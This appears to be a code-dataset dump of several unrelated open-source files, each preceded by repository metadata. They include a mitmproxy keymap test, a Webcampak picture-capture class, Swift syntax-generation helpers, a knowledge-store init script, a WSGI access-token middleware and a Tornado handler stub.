SQLALCHEMY_COMMIT_ON_TEARDOWN = True
# FLASKY_MAIL_SUBJECT_PREFIX = '[Flasky]'
# FLASKY_MAIL_SENDER = 'Flasky Admin <[email protected]>'
# FLASKY_ADMIN = os.environ.get('FLASKY_ADMIN')
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
"""
:summary:
"""
DEBUG = True
# MAIL_SERVER = 'smtp.googlemail.com'
# MAIL_PORT = 587
# MAIL_USE_TLS = True
# MAIL_USERNAME = os.environ.get('MAIL_USERNAME')
# MAIL_PASSWORD = os.environ.get('MAIL_PASSWORD')
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.db')
SQLALCHEMY_MIGRATE_REPO = os.path.join(basedir, 'db_repository')
class TestingConfig(Config):
"""
:summary:
"""
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('TEST_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir,
'data-test.db')
class ProductionConfig(Config):
"""
:summary:
"""
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data.db')
config = {'development': DevelopmentConfig,
'testing': TestingConfig,
'production': ProductionConfig,
'default': DevelopmentConfig} | apache-2.0 | -8,939,346,742,033,719,000 | 24.742424 | 73 | 0.592462 | false |
vhaupert/mitmproxy | test/mitmproxy/tools/console/test_keymap.py | 1 | 5997 | from mitmproxy.tools.console import keymap
from mitmproxy.test import taddons
from unittest import mock
import pytest
def test_binding():
b = keymap.Binding("space", "cmd", ["options"], "")
assert b.keyspec() == " "
def test_bind():
with taddons.context() as tctx:
km = keymap.Keymap(tctx.master)
km.executor = mock.Mock()
with pytest.raises(ValueError):
km.add("foo", "bar", ["unsupported"])
km.add("key", "str", ["options", "commands"])
assert km.get("options", "key")
assert km.get("commands", "key")
assert not km.get("flowlist", "key")
assert len((km.list("commands"))) == 1
km.handle("unknown", "unknown")
assert not km.executor.called
km.handle("options", "key")
assert km.executor.called
km.add("glob", "str", ["global"])
km.executor = mock.Mock()
km.handle("options", "glob")
assert km.executor.called
assert len((km.list("global"))) == 1
def test_join():
with taddons.context() as tctx:
km = keymap.Keymap(tctx.master)
km.add("key", "str", ["options"], "help1")
km.add("key", "str", ["commands"])
assert len(km.bindings) == 1
assert len(km.bindings[0].contexts) == 2
assert km.bindings[0].help == "help1"
km.add("key", "str", ["commands"], "help2")
assert len(km.bindings) == 1
assert len(km.bindings[0].contexts) == 2
assert km.bindings[0].help == "help2"
assert km.get("commands", "key")
km.unbind(km.bindings[0])
assert len(km.bindings) == 0
assert not km.get("commands", "key")
def test_remove():
with taddons.context() as tctx:
km = keymap.Keymap(tctx.master)
km.add("key", "str", ["options", "commands"], "help1")
assert len(km.bindings) == 1
assert "options" in km.bindings[0].contexts
km.remove("key", ["options"])
assert len(km.bindings) == 1
assert "options" not in km.bindings[0].contexts
km.remove("key", ["commands"])
assert len(km.bindings) == 0
def test_load_path(tmpdir):
dst = str(tmpdir.join("conf"))
kmc = keymap.KeymapConfig()
with taddons.context(kmc) as tctx:
km = keymap.Keymap(tctx.master)
tctx.master.keymap = km
with open(dst, 'wb') as f:
f.write(b"\xff\xff\xff")
with pytest.raises(keymap.KeyBindingError, match="expected UTF8"):
kmc.load_path(km, dst)
with open(dst, 'w') as f:
f.write("'''")
with pytest.raises(keymap.KeyBindingError):
kmc.load_path(km, dst)
with open(dst, 'w') as f:
f.write(
"""
- key: key1
ctx: [unknown]
cmd: >
foo bar
foo bar
"""
)
with pytest.raises(keymap.KeyBindingError):
kmc.load_path(km, dst)
with open(dst, 'w') as f:
f.write(
"""
- key: key1
ctx: [chooser]
help: one
cmd: >
foo bar
foo bar
"""
)
kmc.load_path(km, dst)
assert(km.get("chooser", "key1"))
with open(dst, 'w') as f:
f.write(
"""
- key: key2
ctx: [flowlist]
cmd: foo
- key: key2
ctx: [flowview]
cmd: bar
"""
)
kmc.load_path(km, dst)
assert(km.get("flowlist", "key2"))
assert(km.get("flowview", "key2"))
km.add("key123", "str", ["flowlist", "flowview"])
with open(dst, 'w') as f:
f.write(
"""
- key: key123
ctx: [options]
cmd: foo
"""
)
kmc.load_path(km, dst)
assert(km.get("flowlist", "key123"))
assert(km.get("flowview", "key123"))
assert(km.get("options", "key123"))
def test_parse():
kmc = keymap.KeymapConfig()
with taddons.context(kmc):
assert kmc.parse("") == []
assert kmc.parse("\n\n\n \n") == []
with pytest.raises(keymap.KeyBindingError, match="expected a list of keys"):
kmc.parse("key: val")
with pytest.raises(keymap.KeyBindingError, match="expected a list of keys"):
kmc.parse("val")
with pytest.raises(keymap.KeyBindingError, match="Unknown key attributes"):
kmc.parse(
"""
- key: key1
nonexistent: bar
"""
)
with pytest.raises(keymap.KeyBindingError, match="Missing required key attributes"):
kmc.parse(
"""
- help: key1
"""
)
with pytest.raises(keymap.KeyBindingError, match="Invalid type for cmd"):
kmc.parse(
"""
- key: key1
cmd: [ cmd ]
"""
)
with pytest.raises(keymap.KeyBindingError, match="Invalid type for ctx"):
kmc.parse(
"""
- key: key1
ctx: foo
cmd: cmd
"""
)
assert kmc.parse(
"""
- key: key1
ctx: [one, two]
help: one
cmd: >
foo bar
foo bar
"""
) == [{"key": "key1", "ctx": ["one", "two"], "help": "one", "cmd": "foo bar foo bar\n"}] | mit | 3,016,700,950,650,680,000 | 29.602041 | 96 | 0.44739 | false |
Webcampak/cli | webcampak/core/wpakCapture.py | 1 | 22904 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2010-2016 Eurotechnia ([email protected])
# This file is part of the Webcampak project.
# Webcampak is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
# Webcampak is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along with Webcampak.
# If not, see http://www.gnu.org/licenses/
import os
import time
import gettext
from wpakConfigObj import Config
from wpakFileUtils import fileUtils
from wpakTimeUtils import timeUtils
from wpakTransferUtils import transferUtils
from wpakPhidgetsUtils import phidgetsUtils
from capture.wpakCaptureUtils import captureUtils
from capture.wpakCaptureEmails import captureEmails
from capture.wpakCaptureObj import captureObj
from capture.wpakSensorsObj import sensorsObj
from capture.drivers.wpakCaptureGphoto import captureGphoto
from capture.drivers.wpakCaptureIPCam import captureIPCam
from capture.drivers.wpakCaptureWebfile import captureWebfile
from capture.drivers.wpakCaptureTestPicture import captureTestPicture
from capture.drivers.wpakCaptureWpak import captureWpak
from capture.drivers.wpakCaptureRtsp import captureRtsp
from capture.drivers.wpakCapturePhidget import capturePhidget
from wpakPictureTransformations import pictureTransformations
from wpakFTPUtils import FTPUtils
# This class is used to capture a picture or sensors from a source
class Capture(object):
""" This class is used to capture from a source
Args:
log: A class, the logging interface
appConfig: A class, the app config interface
config_dir: A string, filesystem location of the configuration directory
sourceId: Source ID of the source to capture
Attributes:
tbc
"""
def __init__(self, log, appConfig, config_dir, sourceId):
self.log = log
self.appConfig = appConfig
self.config_dir = config_dir
self.currentSourceId = sourceId
self.setSourceId(sourceId)
self.configPaths = Config(self.log, self.config_dir + 'param_paths.yml')
self.dirEtc = self.configPaths.getConfig('parameters')['dir_etc']
self.dirConfig = self.configPaths.getConfig('parameters')['dir_config']
self.dirBin = self.configPaths.getConfig('parameters')['dir_bin']
self.dirSources = self.configPaths.getConfig('parameters')['dir_sources']
self.dirSourceLive = self.configPaths.getConfig('parameters')['dir_source_live']
self.dirSourceCapture = self.configPaths.getConfig('parameters')['dir_source_capture']
self.dirLocale = self.configPaths.getConfig('parameters')['dir_locale']
self.dirLocaleMessage = self.configPaths.getConfig('parameters')['dir_locale_message']
self.dirStats = self.configPaths.getConfig('parameters')['dir_stats']
self.dirCache = self.configPaths.getConfig('parameters')['dir_cache']
self.dirEmails = self.configPaths.getConfig('parameters')['dir_emails']
self.dirResources = self.configPaths.getConfig('parameters')['dir_resources']
self.dirLogs = self.configPaths.getConfig('parameters')['dir_logs']
self.dirXferQueue = self.configPaths.getConfig('parameters')['dir_xfer'] + 'queued/'
self.dirCurrentSource = self.dirSources + 'source' + self.currentSourceId + '/'
self.dirCurrentSourceTmp = self.dirSources + 'source' + self.currentSourceId + '/' + \
self.configPaths.getConfig('parameters')['dir_source_tmp']
self.dirCurrentSourceCapture = self.dirSources + 'source' + self.currentSourceId + '/' + self.dirSourceCapture
self.dirCurrentSourcePictures = self.dirSources + 'source' + self.currentSourceId + '/' + \
self.configPaths.getConfig('parameters')['dir_source_pictures']
self.dirCurrentSourceLogs = self.dirLogs + 'source' + self.currentSourceId + '/'
self.setupLog()
self.log.info("===START===")
self.log.info("capture(): Start")
self.configGeneral = Config(self.log, self.dirConfig + 'config-general.cfg')
self.configSource = Config(self.log, self.dirEtc + 'config-source' + str(self.getSourceId()) + '.cfg')
self.configSourceFTP = Config(self.log,
self.dirEtc + 'config-source' + str(self.currentSourceId) + '-ftpservers.cfg')
self.dirCurrentLocaleMessages = self.dirLocale + self.configSource.getConfig(
'cfgsourcelanguage') + "/" + self.dirLocaleMessage
self.initGetText(self.dirLocale, self.configGeneral.getConfig('cfgsystemlang'),
self.configGeneral.getConfig('cfggettextdomain'))
self.timeUtils = timeUtils(self)
self.fileUtils = fileUtils(self)
self.phidgetsUtils = phidgetsUtils(self)
self.FTPUtils = FTPUtils(self)
self.transferUtils = transferUtils(self)
self.setScriptStartTime(self.timeUtils.getCurrentSourceTime(self.configSource))
# By default, the picture date corresponds to the time the script started
self.log.info("capture(): " + _("Set Capture Time to script start time (default at script startup)"))
self.setCaptureTime(self.getScriptStartTime())
fileCaptureDetails = self.dirSources + 'source' + self.currentSourceId + '/' + self.dirSourceLive + 'last-capture.json'
fileCaptureLog = self.dirCurrentSourceCapture + self.getCaptureTime().strftime("%Y%m%d") + ".jsonl"
self.log.info("capture(): " + _("Create Capture Status object and set script start date"))
self.currentCaptureDetails = captureObj(self.log, fileCaptureLog)
self.currentCaptureDetails.setCaptureFile(fileCaptureDetails)
self.currentCaptureDetails.setCaptureValue('scriptStartDate', self.getScriptStartTime().isoformat())
self.log.info("capture(): " + _("Load previous Capture Status Object (if available)"))
self.lastCaptureDetails = captureObj(self.log)
self.lastCaptureDetails.setCaptureFile(fileCaptureDetails)
self.lastCaptureDetails.loadCaptureFile()
self.captureUtils = captureUtils(self)
self.captureEmails = captureEmails(self)
self.pictureTransformations = pictureTransformations(self)
self.captureUtils.setPictureTransformations(self.pictureTransformations)
self.log.info("capture(): " + _("Initializing the following capture driver: %(captureDriver)s") % {
'captureDriver': self.configSource.getConfig('cfgsourcetype')})
if self.configSource.getConfig('cfgsourcetype') == "gphoto":
# If the source is a gphoto camera
self.captureDriver = captureGphoto(self)
elif self.configSource.getConfig('cfgsourcetype') == "testpicture":
# The source is using a test picture, randomly modified
self.captureDriver = captureTestPicture(self)
elif self.configSource.getConfig('cfgsourcetype') == "ipcam" or (
self.configSource.getConfig('cfgsourcetype') == "wpak" and self.configSource.getConfig(
'cfgsourcewpaktype') == "rec"):
# If the source is an IP Camera
self.captureDriver = captureIPCam(self)
elif self.configSource.getConfig('cfgsourcetype') == "webfile":
# If the source is a Web File
self.captureDriver = captureWebfile(self)
elif self.configSource.getConfig('cfgsourcetype') == "wpak" and self.configSource.getConfig(
'cfgsourcewpaktype') == "get":
# If the source is another source of the same Webcampak
self.captureDriver = captureWpak(self)
elif self.configSource.getConfig('cfgsourcetype') == "rtsp":
# If the source is a RTSP stream
self.captureDriver = captureRtsp(self)
self.captureFilename = None
def setupLog(self):
""" Setup logging to file"""
if not os.path.exists(self.dirCurrentSourceLogs):
os.makedirs(self.dirCurrentSourceLogs)
logFilename = self.dirCurrentSourceLogs + "capture.log"
self.appConfig.set(self.log._meta.config_section, 'file', logFilename)
self.appConfig.set(self.log._meta.config_section, 'rotate', True)
self.appConfig.set(self.log._meta.config_section, 'max_bytes', 512000)
self.appConfig.set(self.log._meta.config_section, 'max_files', 10)
self.log._setup_file_log()
def initGetText(self, dirLocale, cfgsystemlang, cfggettextdomain):
""" Initialize Gettext with the corresponding translation domain
Args:
dirLocale: A string, directory location of the file
cfgsystemlang: A string, webcampak-level language configuration parameter from config-general.cfg
cfggettextdomain: A string, webcampak-level gettext domain configuration parameter from config-general.cfg
Returns:
None
"""
self.log.debug("capture.initGetText(): Start")
try:
t = gettext.translation(cfggettextdomain, dirLocale, [cfgsystemlang], fallback=True)
_ = t.ugettext
t.install()
self.log.info("capture.initGetText(): " + _(
"Initialized gettext with Domain: %(cfggettextdomain)s - Language: %(cfgsystemlang)s - Path: %(dirLocale)s")
% {'cfggettextdomain': cfggettextdomain, 'cfgsystemlang': cfgsystemlang,
'dirLocale': dirLocale})
except:
self.log.error("No translation file available")
# Setters and Getters
def setScriptStartTime(self, scriptStartTime):
self.log.info("capture.setScriptStartTime(): " + _("Script Start Time set to: %(scriptStartTime)s") % {
'scriptStartTime': scriptStartTime.isoformat()})
self.scriptStartTime = scriptStartTime
def getScriptStartTime(self):
return self.scriptStartTime
def setCaptureFilename(self, captureFilename):
self.captureFilename = captureFilename
def getCaptureFilename(self):
return self.captureFilename
def setSourceId(self, sourceId):
self.sourceId = sourceId
def getSourceId(self):
return self.sourceId
def setCaptureTime(self, captureTime=None):
if captureTime == None:
self.captureTime = self.timeUtils.getCurrentSourceTime(self.configSource)
else:
self.captureTime = captureTime
self.log.info("capture.setCaptureTime(): " + _("Capture Time set to: %(captureTime)s") % {
'captureTime': str(self.captureTime)})
return self.captureTime
def getCaptureTime(self):
return self.captureTime
def run(self):
""" Initiate the capture process for the source """
self.log.info("capture.run(): " + _("Initiate capture process for source: %(currentSourceId)s") % {
'currentSourceId': str(self.sourceId)})
# There might be a need to delay the capture by a couple of seconds
if self.configSource.getConfig('cfgcapturedelay') != "0":
self.log.info("capture.run(): " + _("Delaying capture by %(CaptureDelay)s seconds.") % {
'CaptureDelay': str(self.configSource.getConfig('cfgcapturedelay'))})
time.sleep(int(self.configSource.getConfig('cfgcapturedelay')))
if self.configSource.getConfig('cfgcapturedelaydate') != "script":
self.setCaptureTime()
if self.configSource.getConfig('cfgnocapture') == "yes":
self.log.info("capture.run(): " + _("Capture manually disabled via administration panel"))
elif self.configSource.getConfig('cfgsourceactive') != "yes":
self.log.info("capture.run(): " + _("Source is not active, not proceeding with capture"))
elif self.captureUtils.isWithinTimeframe() == False:
self.log.info("capture.run(): " + _("Capture calendar is active but capture not in the correct timeframe"))
elif self.captureUtils.checkInterval() == False:
self.log.info("capture.run(): " + _("Not enough time since last picture was captured, not proceeding"))
else:
# Capture the picture and return an array containing one or more files to be processed
# If multiple files are being processed, the captureDate value is the one of the latest picture captured
capturedPictures = self.captureDriver.capture()
# Used to count the number of times pictures are being processed,
# since we only want to generate hotlink images once per capture cycle
processedPicturesCount = 0
if capturedPictures != False:
for currentPicture in capturedPictures:
self.log.info("capture.run(): " + _("Begin processing of picture: %(currentPicture)s") % {
'currentPicture': currentPicture})
# Set picture filename
self.setCaptureFilename(os.path.splitext(os.path.basename(currentPicture))[0])
self.pictureTransformations.setFilesourcePath(currentPicture)
self.pictureTransformations.setFiledestinationPath(currentPicture)
# Process pictures (crop, resize, watermark, legend, ...)
if processedPicturesCount == 0 or self.configSource.getConfig(
'cfgsourcecamiplimiterotation') != "yes":
self.captureUtils.modifyPictures(True)
else: # Only generate the hotlink for the first picture being processed
self.captureUtils.modifyPictures(False)
# Copy pictures to live/ directory as last-capture.jpg or last-capture.raw
if self.configSource.getConfig('cfghotlinkmax') != "no":
self.captureUtils.createLivePicture(self.getCaptureFilename())
# Archive picture to its definitive location
self.captureUtils.archivePicture(self.getCaptureFilename())
# Create hotlinks and send those by FTP if enabled
self.captureUtils.generateHotlinks()
# Send file to first remote FTP Server
self.captureUtils.sendPicture(self.configSource.getConfig('cfgftpmainserverid'),
self.configSource.getConfig('cfgftpmainserverretry'),
self.configSource.getConfig('cfgftpmainserverraw'),
self.captureFilename)
# Send file to second remote FTP Server
self.captureUtils.sendPicture(self.configSource.getConfig('cfgftpsecondserverid'),
self.configSource.getConfig('cfgftpsecondserverretry'),
self.configSource.getConfig('cfgftpsecondserverraw'),
self.captureFilename)
# Copy file to first internal source
if self.configSource.getConfig('cfgcopymainenable') == "yes":
self.captureUtils.copyPicture(self.configSource.getConfig('cfgcopymainsourceid'),
self.configSource.getConfig('cfgcopymainsourceraw'),
self.captureFilename)
# Copy file to second internal source
if self.configSource.getConfig('cfgcopysecondenable') == "yes":
self.captureUtils.copyPicture(self.configSource.getConfig('cfgcopysecondsourceid'),
self.configSource.getConfig('cfgcopysecondsourceraw'),
self.captureFilename)
# Automtically purge old pictures
self.captureUtils.purgePictures(self.getCaptureFilename())
storedJpgSize = self.captureUtils.getArchivedSize(self.getCaptureFilename(), "jpg")
storedRawSize = self.captureUtils.getArchivedSize(self.getCaptureFilename(), "raw")
self.currentCaptureDetails.setCaptureValue('storedJpgSize',
self.currentCaptureDetails.getCaptureValue(
'storedJpgSize') + storedJpgSize)
self.currentCaptureDetails.setCaptureValue('storedRawSize',
self.currentCaptureDetails.getCaptureValue(
'storedRawSize') + storedRawSize)
self.currentCaptureDetails.setCaptureValue('totalCaptureSize',
self.currentCaptureDetails.getCaptureValue(
'totalCaptureSize') + int(
storedJpgSize + storedRawSize))
processedPicturesCount = processedPicturesCount + 1
self.log.info("capture.run(): " + _("Capture process completed"))
self.currentCaptureDetails.setCaptureValue('captureSuccess', True)
if os.path.isfile(self.dirCache + "source" + self.currentSourceId + "-errorcount"):
os.remove(self.dirCache + "source" + self.currentSourceId + "-errorcount")
else:
self.log.info("capture.run(): " + _("Unable to capture picture"))
self.captureUtils.generateFailedCaptureHotlink()
self.currentCaptureDetails.setCaptureValue('captureSuccess', False)
self.captureUtils.setCustomCounter('errorcount', int(self.captureUtils.getCustomCounter('errorcount')) + 1)
if self.configSource.getConfig('cfgcapturedeleteafterdays') != "0":
# Purge old pictures (by day)
self.captureUtils.deleteOldPictures()
if self.configSource.getConfig('cfgcapturemaxdirsize') != "0":
# Purge old pictures (by size)
self.captureUtils.deleteOverSize()
if self.configGeneral.getConfig('cfgstatsactivate') == "yes":
self.captureUtils.sendUsageStats()
# if self.configSource.getConfig('cfgemailcapturestats') == "yes":
# self.captureEmails.sendCaptureStats()
sensorFilename = self.getCaptureTime().strftime("%Y%m%d") + "-sensors.jsonl"
fileCaptureLog = self.dirCurrentSourcePictures + self.getCaptureTime().strftime("%Y%m%d") + "/" + sensorFilename
if self.configGeneral.getConfig('cfgphidgetactivate') == "yes" and self.configSource.getConfig(
'cfgphidgetactivate') == "yes":
capturedSensors = capturePhidget(self).capture()
currentSensorsDetails = sensorsObj(self.log, fileCaptureLog)
currentSensorsDetails.setSensorsValue('date', self.getCaptureTime().isoformat())
currentSensorsDetails.setSensorsValue('sensors', capturedSensors)
# Record capture interval
sourceCaptureInterval = int(self.configSource.getConfig('cfgcroncapturevalue'))
if self.configSource.getConfig('cfgcroncaptureinterval') == "minutes":
sourceCaptureInterval = int(self.configSource.getConfig('cfgcroncapturevalue')) * 60
currentSensorsDetails.setSensorsValue('interval', sourceCaptureInterval)
currentSensorsDetails.archiveSensorsFile()
#If the phidget sensor file exists, it is being sent throughout the chain.
if (os.path.isfile(fileCaptureLog)):
# Send file to first remote FTP Server
self.captureUtils.sendSensor(self.configSource.getConfig('cfgftpmainserverid'),
self.configSource.getConfig('cfgftpmainserverretry'),
sensorFilename)
# Send file to second remote FTP Server
self.captureUtils.sendSensor(self.configSource.getConfig('cfgftpsecondserverid'),
self.configSource.getConfig('cfgftpsecondserverretry'),
sensorFilename)
# Copy file to first internal source
if self.configSource.getConfig('cfgcopymainenable') == "yes":
self.captureUtils.copySensor(self.configSource.getConfig('cfgcopymainsourceid'),
sensorFilename)
# Copy file to second internal source
if self.configSource.getConfig('cfgcopysecondenable') == "yes":
self.captureUtils.copySensor(self.configSource.getConfig('cfgcopysecondsourceid'),
sensorFilename)
scriptEndDate = self.timeUtils.getCurrentSourceTime(self.configSource)
totalCaptureTime = int((scriptEndDate - self.getScriptStartTime()).total_seconds() * 1000)
self.log.info("capture.run(): " + _("Capture: Overall capture time: %(TotalCaptureTime)s ms") % {
'TotalCaptureTime': str(totalCaptureTime)})
self.currentCaptureDetails.setCaptureValue('scriptEndDate', scriptEndDate.isoformat())
self.currentCaptureDetails.setCaptureValue('scriptRuntime', totalCaptureTime)
self.currentCaptureDetails.setCaptureValue('processedPicturesCount', processedPicturesCount)
# Two different files are being stored here:
# - The last-capture file, which is only being stored id the capture is successful
# - The capture archive, which contains all capture requests (successful or not)
if capturedPictures != False:
self.currentCaptureDetails.writeCaptureFile()
self.currentCaptureDetails.archiveCaptureFile()
self.log.info(
"capture.run(): " + _("-----------------------------------------------------------------------"))
self.log.info("===END===")
| gpl-3.0 | -3,304,625,089,856,374,300 | 56.26 | 127 | 0.627925 | false |
tjw/swift | utils/gyb_syntax_support/__init__.py | 1 | 3605 | import textwrap
from AttributeNodes import ATTRIBUTE_NODES
from CommonNodes import COMMON_NODES # noqa: I201
from DeclNodes import DECL_NODES # noqa: I201
from ExprNodes import EXPR_NODES # noqa: I201
from GenericNodes import GENERIC_NODES # noqa: I201
from PatternNodes import PATTERN_NODES # noqa: I201
from StmtNodes import STMT_NODES # noqa: I201
import Token
from TypeNodes import TYPE_NODES # noqa: I201
# Re-export global constants
SYNTAX_NODES = COMMON_NODES + EXPR_NODES + DECL_NODES + ATTRIBUTE_NODES + \
STMT_NODES + GENERIC_NODES + TYPE_NODES + PATTERN_NODES
SYNTAX_TOKENS = Token.SYNTAX_TOKENS
SYNTAX_TOKEN_MAP = Token.SYNTAX_TOKEN_MAP
def make_missing_child(child):
"""
Generates a C++ call to make the raw syntax for a given Child object.
"""
if child.is_token():
token = child.main_token()
tok_kind = token.kind if token else "unknown"
tok_text = token.text if token else ""
return 'RawSyntax::missing(tok::%s, "%s")' % (tok_kind, tok_text)
else:
missing_kind = "Unknown" if child.syntax_kind == "Syntax" \
else child.syntax_kind
if child.node_choices:
return make_missing_child(child.node_choices[0])
return 'RawSyntax::missing(SyntaxKind::%s)' % missing_kind
def check_child_condition_raw(child):
"""
Generates a C++ closure to check whether a given raw syntax node can
satisfy the requirements of child.
"""
result = '[](const RC<RawSyntax> &Raw) {\n'
result += ' // check %s\n' % child.name
if child.token_choices:
result += 'if (!Raw->isToken()) return false;\n'
result += 'auto TokKind = Raw->getTokenKind();\n'
tok_checks = []
for choice in child.token_choices:
tok_checks.append("TokKind == tok::%s" % choice.kind)
result += 'return %s;\n' % (' || '.join(tok_checks))
elif child.text_choices:
result += 'if (!Raw->isToken()) return false;\n'
result += 'auto Text = Raw->getTokenText();\n'
tok_checks = []
for choice in child.text_choices:
tok_checks.append('Text == "%s"' % choice)
result += 'return %s;\n' % (' || '.join(tok_checks))
elif child.node_choices:
node_checks = []
for choice in child.node_choices:
node_checks.append(check_child_condition_raw(choice) + '(Raw)')
result += 'return %s;\n' % ((' || ').join(node_checks))
else:
result += 'return %s::kindof(Raw->getKind());' % child.type_name
result += '}'
return result
def make_missing_swift_child(child):
"""
Generates a Swift call to make the raw syntax for a given Child object.
"""
if child.is_token():
token = child.main_token()
tok_kind = token.swift_kind() if token else "unknown"
if not token or not token.text:
tok_kind += '("")'
return 'RawSyntax.missingToken(.%s)' % tok_kind
else:
missing_kind = "unknown" if child.syntax_kind == "Syntax" \
else child.swift_syntax_kind
return 'RawSyntax.missing(.%s)' % missing_kind
def create_node_map():
"""
Creates a lookup table to find nodes by their kind.
"""
return {node.syntax_kind: node for node in SYNTAX_NODES}
def is_visitable(node):
return not node.is_base() and not node.collection_element
def dedented_lines(description):
"""
Each line of the provided string with leading whitespace stripped.
"""
if not description:
return []
return textwrap.dedent(description).split('\n')
| apache-2.0 | -4,316,504,402,919,193,600 | 34.343137 | 75 | 0.618863 | false |
enriquepablo/terms.server | terms/server/scripts/initialize.py | 1 | 3315 |
import os
import sys
from multiprocessing.connection import Client
import bcrypt
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.exc import NoResultFound
from terms.server.scripts.webserver import get_config
from terms.server.schemata import Schema
from terms.server.pluggable import load_plugins, get_plugins
from terms.server.pluggable import ImportRegistry, Base
from terms.server.app.schemata import Person
def import_ontologies(config, session):
'''
get directory
cycle over trm files
if the file name not in importregistry
break file content on dots
send pieces to server
put filename in importregistry
'''
for module in get_plugins(config):
fname = os.path.join(os.path.dirname(module.__file__), 'ontology', 'terms.trm')
totell = []
kb = Client((config('kb_host'), int(config('kb_port'))))
with open(fname, 'r') as f:
for line in f.readlines():
if line:
kb.send_bytes(line)
kb.send_bytes('FINISH-TERMS')
for fact in iter(kb.recv_bytes, 'END'):
print(fact)
kb.close()
def import_exec_globals(config, session):
'''
get exec_globals directory
cycle over its files
if the file name not in importregistry
send its contents to server
put filename in importregistry
'''
for module in get_plugins(config):
dirname = os.path.join(os.path.dirname(module.__file__),
'exec_globals')
for fname in sorted(os.listdir(dirname)):
if fname.endswith('.py'):
name = 'execs:' + fname[:-3]
try:
session.query(ImportRegistry).filter(ImportRegistry.name==name).one()
except NoResultFound:
path = os.path.join(dirname, fname)
with open(path, 'r') as f:
eg = f.read()
kb = Client((config('kb_host'), int(config('kb_port'))))
kb.send_bytes('compiler:exec_globals:' + eg)
kb.send_bytes('FINISH-TERMS')
for fact in iter(kb.recv_bytes, 'END'):
print(fact)
kb.close()
ir = ImportRegistry(name)
session.add(ir)
def init_terms():
config = get_config()
address = '%s/%s' % (config('dbms'), config('dbname'))
load_plugins(config)
engine = create_engine(address)
Schema.metadata.create_all(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
import_ontologies(config, session)
import_exec_globals(config, session)
pass1 = 'admin'
# we need defaults for automated scripts here
# pass1, pass2 = '', ' '
# while pass1 != pass2:
# pass1 = raw_input('Enter a password for the admin user: ')
# pass2 = raw_input('Repeat it: ')
password = bcrypt.hashpw(pass1, bcrypt.gensalt())
admin = Person(_id='admin', name='admin', surname='superuser', password=password)
session.add(admin)
session.commit()
session.close()
sys.exit('Created knowledge store %s' % config('dbname'))
| gpl-3.0 | 6,884,474,950,106,547,000 | 34.645161 | 89 | 0.590649 | false |
pythonpro-dev/pp-apiaccesstoken | pp/apiaccesstoken/middleware.py | 1 | 3860 | # -*- coding: utf-8 -*-
"""
"""
import logging
from pp.apiaccesstoken.tokenmanager import Manager
from pp.apiaccesstoken.tokenmanager import AccessTokenInvalid
from pp.apiaccesstoken.headers import WSGI_ENV_ACCESS_TOKEN_HEADER
def get_log(e=None):
return logging.getLogger("{0}.{1}".format(__name__, e) if e else __name__)
def recover_secret(access_token):
"""Given the access_token recover the access_secret to verify it with.
:params access_secret: The access token string.
:returns: access_secret on success or None on failure.
"""
raise NotImplementedError('No Valid Access Detail Recovery Provided')
class ValidateAccessToken(object):
"""Validate and API access token and populate the wsgi environment with
the identity recovered.
ValidateAccessToken.HTTP_HEADER is the name of the wsgi env variable to
look for.
ValidateAccessToken.ENV_KEY is the name wsgi env variable to store
the identity in. The value of the identity is recovered from the 'identity'
field in the access_token payload.
The constructor for this class takes a recover_secret() function. This
needs to be provided or NotImplementedError will be raised. This function
recovers the access_secret for the given access_token if any. If this
function returns None then nothing was recovered and the token is invalid.
"""
# The wsgi environment variable to set when an identity was found:
ENV_KEY = 'pp.api_access.identity'
def __init__(
self, application, recover_secret=recover_secret
):
self.log = get_log('ValidateAccessToken')
self.application = application
self.recover_secret = recover_secret
def recover_access(self, environ, access_token):
"""Populate the environment with the user identity recovered from the
payload of the access_token.
To get the payload the access_token needs its corresponding
access_secret to recover it.
"""
log = get_log('ValidateAccessToken.recover_access')
log.debug("recovering the access_secret for access_token:{}".format(
access_token
))
try:
access_secret = self.recover_secret(access_token)
if access_secret:
log.debug(
"access_secret for access_token:{} recovered OK.".format(
access_token
)
)
man = Manager(access_secret)
payload = man.verify_access_token(access_token)
log.debug(
"Payload recovered for '{}'. Looking for identity.".format(
access_token
)
)
identity = payload['identity']
self.log.debug(
"Token Valid. Adding identity '{}' environ.".format(
identity
)
)
environ[self.ENV_KEY] = identity
else:
self.log.debug(
"No secret recovered for '{}'. Ignoring token.".format(
access_token
)
)
except AccessTokenInvalid, e:
self.log.error(
"token validation fail: '{}'".format(e)
)
except Exception, e:
self.log.exception(
"General error validating token: '{}'".format(e)
)
def __call__(self, environ, start_response):
"""Wsgi hook into kicking off the token validation and identity
recovery.
"""
access_token = environ.get(WSGI_ENV_ACCESS_TOKEN_HEADER)
if access_token:
self.recover_access(environ, access_token)
return self.application(environ, start_response)
| bsd-3-clause | -3,918,434,066,661,931,500 | 31.711864 | 79 | 0.594301 | false |
boun-cmpe-soslab/drenaj | drenaj/drenaj_api/handlers/campaignshandler.py | 1 | 8934 | import bson.json_util
import tornado.ioloop
import tornado.web
from pymongo.errors import OperationFailure
from tornado import gen
from tornado.web import HTTPError
from tornado.web import MissingArgumentError
import drenaj_api.utils.drenajneo4jmanager as drenajneo4jmanager
class CampaignsHandler(tornado.web.RequestHandler):
## def datetime_hook(self, dct):
## # TODO: this only checks for the first level 'created_at'
## # We should think about whether making this recursive.
## if 'created_at' in dct:
## time_struct = time.strptime(dct['created_at'], "%a %b %d %H:%M:%S +0000 %Y") #Tue Apr 26 08:57:55 +0000 2011
## dct['created_at'] = datetime.datetime.fromtimestamp(time.mktime(time_struct))
## return bson.json_util.object_hook(dct)
## return bson.json_util.object_hook(dct)
